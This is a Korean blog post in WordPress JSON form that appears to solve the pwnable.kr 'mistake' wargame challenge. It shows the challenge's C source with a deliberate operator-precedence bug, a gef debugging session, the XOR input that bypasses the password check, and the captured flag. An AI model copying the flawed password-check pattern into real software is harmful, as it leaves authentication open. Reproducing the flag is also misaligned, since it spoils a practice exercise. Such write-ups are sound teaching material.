{"id":3254,"date":"2025-04-06T09:02:40","date_gmt":"2025-04-06T00:02:40","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3254"},"modified":"2025-04-06T09:02:55","modified_gmt":"2025-04-06T00:02:55","slug":"mistake","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3254","title":{"rendered":"mistake"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Description<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">We all make mistakes, let's move on.\n(don't take this too seriously, no fancy hacking skill is required at all)\nThis task is based on real event\n\nssh mistake@pwnable.kr -p2222 (pw:guest)<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Source Code<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li>mistake.c<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;fcntl.h>\n\n#define PW_LEN 10\n#define XORKEY 1\n\nvoid xor(char* s, int len){\n\tint i;\n\tfor(i=0; i&lt;len; i++){\n\t\ts[i] ^= XORKEY;\n\t}\n}\n\nint main(int argc, char* argv[]){\n\t\n\tint fd;\n\tif(fd=open(\"\/home\/mistake\/password\",O_RDONLY,0400) &lt; 0){\n\t\tprintf(\"can't open password %d\\n\", fd);\n\t\treturn 0;\n\t}\n\n\tprintf(\"do not bruteforce...\\n\");\n\tsleep(time(0)%20);\n\n\tchar pw_buf[PW_LEN+1];\n\tint len;\n\tif(!(len=read(fd,pw_buf,PW_LEN) > 0)){\n\t\tprintf(\"read error\\n\");\n\t\tclose(fd);\n\t\treturn 0;\t\t\n\t}\n\n\tchar pw_buf2[PW_LEN+1];\n\tprintf(\"input password : \");\n\tscanf(\"%10s\", pw_buf2);\n\n\t\/\/ xor your input\n\txor(pw_buf2, 10);\n\n\tif(!strncmp(pw_buf, pw_buf2, PW_LEN)){\n\t\tprintf(\"Password OK\\n\");\n\t\tsetregid(getegid(), getegid());\n\t\tsystem(\"\/bin\/cat flag\\n\");\n\t}\n\telse{\n\t\tprintf(\"Wrong Password\\n\");\n\t}\n\n\tclose(fd);\n\treturn 0;\n}<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Analysis<\/h1>\n\n\n\n<p>strncmp\uc5d0 \ube0c\ub808\uc774\ud06c\ud3ec\uc778\ud2b8 \uc124\uce58\ud558\uace0, \uac01\uac01 AAAAAAAAAA, BBBBBBBBBB\ub97c \uc785\ub825\ud588\uc744\ub54c gef\uc5d0\uc11c \ub2e4\uc74c\uacfc \uac19\uc740 \uacb0\uacfc\ub97c \ubcfc \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4  r\nStarting program: \/home\/ubuntu\/pwnable.kr\/mistake\/mistake \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"\/lib\/x86_64-linux-gnu\/libthread_db.so.1\".\ndo not bruteforce...\nAAAAAAAAAA\nBBBBBBBBBB\ninput password : \nBreakpoint 1, __strncmp_sse2 () at ..\/sysdeps\/x86_64\/strcmp.S:108\n108\t..\/sysdeps\/x86_64\/strcmp.S: No such file or directory.\n\n[ Legend: Modified register | Code | Heap | Stack | String ]\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n$rax   : 0x00007fffffffe482  \u2192  \"AAAAAAAAAA\"\n$rbx   : 0x0               \n$rcx   : 0x00007fffffffe48d  \u2192  \"CCCCCCCCCC\"\n$rdx   : 0xa               \n$rsp   : 0x00007fffffffe458  \u2192  0x0000555555555486  \u2192  &lt;main+0173> test eax, eax\n$rbp   : 0x00007fffffffe4b0  \u2192  0x0000000000000001\n$rsi   : 0x00007fffffffe48d  \u2192  \"CCCCCCCCCC\"\n$rdi   : 0x00007fffffffe482  \u2192  \"AAAAAAAAAA\"\n$rip   : 0x00007ffff7e3f020  \u2192  &lt;__strncmp_sse2+0000> endbr64 \n$r8    : 0x0               \n$r9    : 0x00005555555596b0  \u2192  \"BBBBBBBBBB\\\\n\"\n$r10   : 0xffffffffffffff80\n$r11   : 0x0               \n$r12   : 0x00007fffffffe5c8  \u2192  0x00007fffffffe807  \u2192  \"\/home\/ubuntu\/pwnable.kr\/mistake\/mistake\"\n$r13   : 0x0000555555555313  \u2192  &lt;main+0000> endbr64 \n$r14   : 0x0000555555557d60  \u2192  0x0000555555555280  \u2192  &lt;__do_global_dtors_aux+0000> endbr64 \n$r15   : 0x00007ffff7ffd040  \u2192  0x00007ffff7ffe2e0  \u2192  0x0000555555554000  \u2192   jg 0x555555554047\n$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]\n$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00 \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n0x00007fffffffe458\u2502+0x0000: 0x0000555555555486  \u2192  &lt;main+0173> test eax, eax\t \u2190 $rsp\n0x00007fffffffe460\u2502+0x0008: 0x00007fffffffe5c8  \u2192  0x00007fffffffe807  \u2192  \"\/home\/ubuntu\/pwnable.kr\/mistake\/mistake\"\n0x00007fffffffe468\u2502+0x0010: 0x0000000100000000\n0x00007fffffffe470\u2502+0x0018: 0x0000000000000000\n0x00007fffffffe478\u2502+0x0020: 0x0000000100000000\n0x00007fffffffe480\u2502+0x0028: 0x4141414141410000\n0x00007fffffffe488\u2502+0x0030: 0x4343430041414141 (\"AAAA\"?)\n0x00007fffffffe490\u2502+0x0038: 0x0043434343434343 (\"CCCCCCC\"?)\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:x86:64 \u2500\u2500\u2500\u2500\n   0x7ffff7e3f012 &lt;__strcmp_sse2_unaligned+02a2> ret    \n   0x7ffff7e3f013                  cs     nop WORD PTR [rax+rax*1+0x0]\n   0x7ffff7e3f01d                  nop    DWORD PTR [rax]\n \u2192 0x7ffff7e3f020 &lt;__strncmp_sse2+0000> endbr64 \n   0x7ffff7e3f024 &lt;__strncmp_sse2+0004> test   rdx, rdx\n   0x7ffff7e3f027 &lt;__strncmp_sse2+0007> je     0x7ffff7e40864 &lt;__strncmp_sse2+6212>\n   0x7ffff7e3f02d &lt;__strncmp_sse2+000d> cmp    rdx, 0x1\n   0x7ffff7e3f031 &lt;__strncmp_sse2+0011> je     0x7ffff7e40870 &lt;__strncmp_sse2+6224>\n   0x7ffff7e3f037 &lt;__strncmp_sse2+0017> mov    r11, rdx\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n[#0] Id 1, Name: \"mistake\", stopped 0x7ffff7e3f020 in __strncmp_sse2 (), reason: BREAKPOINT\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n[#0] 0x7ffff7e3f020 \u2192 __strncmp_sse2()\n[#1] 0x555555555486 \u2192 main()\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ngef\u27a4  <\/pre>\n\n\n\n<p>\uccab\ubc88\uc9f8 \ub9e4\uac1c\ubcc0\uc218\ub294 <code>A<\/code> 10\uac1c\uac00 \ub4e4\uc5b4\uac14\uace0, 2\ubc88\uc9f8 \ub9e4\uac1c\ubcc0\uc218\uc5d0\ub294 <code>C<\/code> 10\uac1c\uac00 \ub4e4\uc5b4\uac04 \uac83\uc744 \ubcf4\uba74, 2\ubc88\uc9f8\ub54c \uc785\ub825\ud588\ub358 <code>B<\/code> 10\uac1c\uac00 <code>1\uacfc XOR<\/code>\ub418\uc5b4 \ub098\uc628 \uac83\uc744 \uc54c \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<p>0x41\uc744 1\uacfc XOR\ud55c <code>@<\/code>\ub97c 2\ubc88\uc9f8\ub54c \uc785\ub825\ud574\uc8fc\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">>>> chr(ord('A') ^ 1)\n'@'<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Why?<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">if(fd=open(\"\/home\/mistake\/password\",O_RDONLY,0400) &lt; 0){<\/pre>\n\n\n\n<p><code>open(\"\/home\/mistake\/password\",O_RDONLY,0400)<\/code> \ud568\uc218\ub294 \uc591\uc218\uc778 fd \uac12\uc744 \ubc18\ud658\ud55c\ub2e4.<\/p>\n\n\n\n<p>\uc5f0\uc0b0\uc790 \uc6b0\uc120\uc21c\uc704 \ub54c\ubb38\uc5d0 \ud06c\uae30 \ube44\uad50\uc778 (&lt;)\ub97c \uba3c\uc800\ud558\uace0 fd\uc640 0\uc744 \ub300\uc18c\ube44\uad50\ud558\uba74 false\uac00 \ub418\ubbc0\ub85c, \ucd5c\uc885\uc801\uc73c\ub85c fd\ub294 0\uc774\ub41c\ub2e4.<\/p>\n\n\n\n<p>\ub530\ub77c\uc11c password\ub294 \ud30c\uc77c\ub85c\ubd80\ud130 \uc77d\ub294\uac8c \uc544\ub2c8\ub77c <br>\ud45c\uc900 \uc785\ub825\uc73c\ub85c \uc6b0\ub9ac\uac00 \uc784\uc758\ub85c \uc9c0\uc815\uc904 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Result<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">mistake@ubuntu:~$ .\/mistake\ndo not bruteforce...\nAAAAAAAAAA\ninput password : @@@@@@@@@@\nPassword OK\nMommy_the_0perator_priority_confuses_me<\/pre>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Description Source Code Analysis strncmp\uc5d0 \ube0c\ub808\uc774\ud06c\ud3ec\uc778\ud2b8 \uc124\uce58\ud558\uace0, \uac01\uac01 AAAAAAAAAA, BBBBBBBBBB\ub97c \uc785\ub825\ud588\uc744\ub54c gef\uc5d0\uc11c \ub2e4\uc74c\uacfc \uac19\uc740 \uacb0\uacfc\ub97c \ubcfc \uc218 \uc788\ub2e4. \uccab\ubc88\uc9f8 \ub9e4\uac1c\ubcc0\uc218\ub294 A 10\uac1c\uac00 \ub4e4\uc5b4\uac14\uace0, 2\ubc88\uc9f8 \ub9e4\uac1c\ubcc0\uc218\uc5d0\ub294 C 10\uac1c\uac00 \ub4e4\uc5b4\uac04 \uac83\uc744 \ubcf4\uba74, 2\ubc88\uc9f8\ub54c \uc785\ub825\ud588\ub358 B 10\uac1c\uac00 1\uacfc XOR\ub418\uc5b4 \ub098\uc628 \uac83\uc744 \uc54c \uc218 \uc788\ub2e4. 0x41\uc744 1\uacfc XOR\ud55c @\ub97c 2\ubc88\uc9f8\ub54c \uc785\ub825\ud574\uc8fc\uba74 \ub41c\ub2e4. Why? open(&#8220;\/home\/mistake\/password&#8221;,O_RDONLY,0400) \ud568\uc218\ub294 \uc591\uc218\uc778 fd \uac12\uc744 \ubc18\ud658\ud55c\ub2e4.&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3254\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">mistake<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-3254","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3254","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3254"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3254\/revisions"}],"predecessor-version":[{"id":3255,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3254\/revisions\/3255"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3254"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3254"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3254"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}